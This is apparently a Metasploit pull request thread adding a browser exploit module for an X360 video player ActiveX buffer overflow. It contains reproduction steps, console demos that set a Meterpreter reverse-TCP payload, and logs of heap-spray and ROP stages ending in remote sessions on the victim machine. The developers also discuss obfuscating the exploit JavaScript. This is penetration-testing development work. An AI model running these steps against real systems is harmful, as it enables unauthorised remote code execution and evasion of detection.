Add module for EDB-35948, X360 Software actvx buffer overflow

[jvazquez-r7]

Full bug history here: https://rh0dev.github.io/blog/2015/fun-with-info-leaks/

The exploit is kinda nice because bypasses ASLR/DEP from a .data buffer overflow. So, it's a nice case study, and worths to have it into the framework I think!

Verification

• Install Windows 7 SP1
• Install IE 10
• Install the vulnerable software. The version I downloaded from: http://www.x360soft.com/demo/videoplayersetup.exe was vulnerable
• Allow the vulnerable ActiveX to run with IE. Just load any web page using the control and allow IE to use it.
• From the framework con sole, use the module (see demo)
• Set srvhost, payload and lhost (see demo)
• exploit, visit the link from the victim, hopefully get sessions!

DEMO

msf > use exploit/windows/browser/x360_video_player_set_text_bof
msf exploit(x360_video_player_set_text_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(x360_video_player_set_text_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(x360_video_player_set_text_bof) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(x360_video_player_set_text_bof) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(x360_video_player_set_text_bof) > [*] Using URL: http://172.16.158.1:8080/m82H3OcyvAWMQ
[*] Server started.
[*] 172.16.158.131   x360_video_player_set_text_bof - Gathering target information.
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending response HTML.
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending main.html...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/exploit.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending exploit.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/sprayer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending sprayer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/informer.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending informer.js...
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/js/rop_builder.js
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending rop_builder.js...
[*] Sending stage (770048 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49171) at 2015-02-06 14:56:26 -0600
[*] Session ID 1 (172.16.158.1:4444 -> 172.16.158.131:49171) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3180)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3556
[*] 172.16.158.131   x360_video_player_set_text_bof - Request: /m82H3OcyvAWMQ/aLJXQL/
[*] 172.16.158.131   x360_video_player_set_text_bof - Sending main.html...
[+] Successfully migrated to process

msf exploit(x360_video_player_set_text_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 1 closed.  Reason: User exit

[jvazquez-r7]

Damn it, Pls, gimme some mins. Did it because was having some problems with JsObfu. Was to fill a bug, but I've discovered I was just using it incorrectly. Please, gimme some mins to use JsObfu here :)

thanks!

[jvazquez-r7]

nvm, I don't find an easy (or not easy) way of obfuscating different JS files which are related between them. And I'd like to keep the JS as is, because it's easier to read and reuse in the future than a super big JS file :\ If there is a way to do it with the current JSObfu I'm glad of listening, maybe I'm overlooking it!

[wchen-r7]

What are you trying to do? Tracking variables?

Comments should be automatically stripped.

[jvazquez-r7]

Already discussed with @wchen-r7, for the record: the thing is which JS is split in several files. We need to reference classes and its methods from other files.

[wchen-r7]

I can't really remember if this is one of those limitations @joevennix and I have discussed before with Jsobfu. Tagging him here so he can take a look maybe. If yes I probably need to mention this in the wiki documentation.

[joevennix]

Ohh I see, the obfuscated code is running correctly for you, but the obfuscation screws up your heap spray.

Yeah. jsobfu is not very gentle on memory allocation/consumption. Not sure what you can do here. Probably jsobfu needs some options to specify what types of obfuscation you want to use: that way you can turn off everything but variable renaming and whitespace-stripping.

[jvazquez-r7]

@joevennix if you use the JS from this branch, but with JSObfu I get:

SCRIPT5009: 'Exploit' is undefined 
whGOvE, line 9 character 1

From <body onload="e = new Exploit(); e.run();">

If I use https://github.com/jvazquez-r7/metasploit-framework/tree/edb_35948_jsobfu_no_var (having into account your recommendations), the JS loads okey, unfortunately the heap spray isn't reliable anymore on my tests :( and it can't get a reliable address where an array will live.

[joevennix]

Now tracked as an issue in jsobfu: rapid7/jsobfu#8

With those features, you'd be able to set obfuscate_strings: false, and rewrite_globals: false.

It looks like we already support passing scope in as a constructor option, so you could have gotten away with persisting the same scope and just passing it into each JSObfu() constructor.

[jvazquez-r7]

@joevennix oo you answered again before my last comment haha, yeah, that! not a big deal, just something to work on :)

We already have filled a ticket #4728 with some enhancements for BES in case you would like to follow! :)

[jvazquez-r7]

@joevennix ooo thanks for filling rapid7/jsobfu#8 !!

[wchen-r7]

No block based?

[kernelsmith]

@wchen-r7 is saying this is safer and maybe more canonical, don't remember for sure:

def informer_template(cli, target_info)
  path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
  template = nil
  # and I would recommend this check
  if File.readable?(path)
    # this will automatically close the file handle
    File.new(path, 'rb') {|f| template = strip_comments(f.read)}
    [template, binding]
  else
    # decide if you want to throw an error here, or return "" instead of nil if you want
    # if you're going to return nil anyways, you can pull the [template, binding] out & put it after the if
    ['', binding]
  end
end

[jvazquez-r7]

I can make it block based, of course.

[wchen-r7]

@kernelsmith yeah, it ensures resource deallocation.

[wchen-r7]

Pretty good idea with your external files. I might do that too.

[wchen-r7]

You're missing a word here.

[jvazquez-r7]

This pr is waiting for rapid7/jsobfu#9 to add obfuscation. Otherwise, can be landed without obfuscation and I can do a new PR once rapid7/jsobfu#9 is landed and the new gem published.

[wchen-r7]

I don't really believe the obfuscation PRs are blockers for this one, so I'm just gonna go ahead and process this.

[wchen-r7]

msf exploit(x360_video_player_set_text_bof) > [*] Using URL: http://0.0.0.0:8181/Fflx65LF4Hc
[*]  Local IP: http://192.168.1.64:8181/Fflx65LF4Hc
[*] Server started.
[*] 192.168.1.106    x360_video_player_set_text_bof - Gathering target information.
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending response HTML.
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending main.html...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/exploit.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending exploit.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/sprayer.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending sprayer.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/informer.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending informer.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/js/rop_builder.js
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending rop_builder.js...
[*] 192.168.1.106    x360_video_player_set_text_bof - Request: /Fflx65LF4Hc/NPXESJ/
[*] 192.168.1.106    x360_video_player_set_text_bof - Sending main.html...
[*] Sending stage (770048 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.106:51293) at 2015-02-17 11:38:25 -0600
[*] Session ID 1 (192.168.1.64:4444 -> 192.168.1.106:51293) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2060)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1692
[*] Sending stage (770048 bytes) to 192.168.1.106
[+] Successfully migrated to process 
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.106:51306) at 2015-02-17 11:38:33 -0600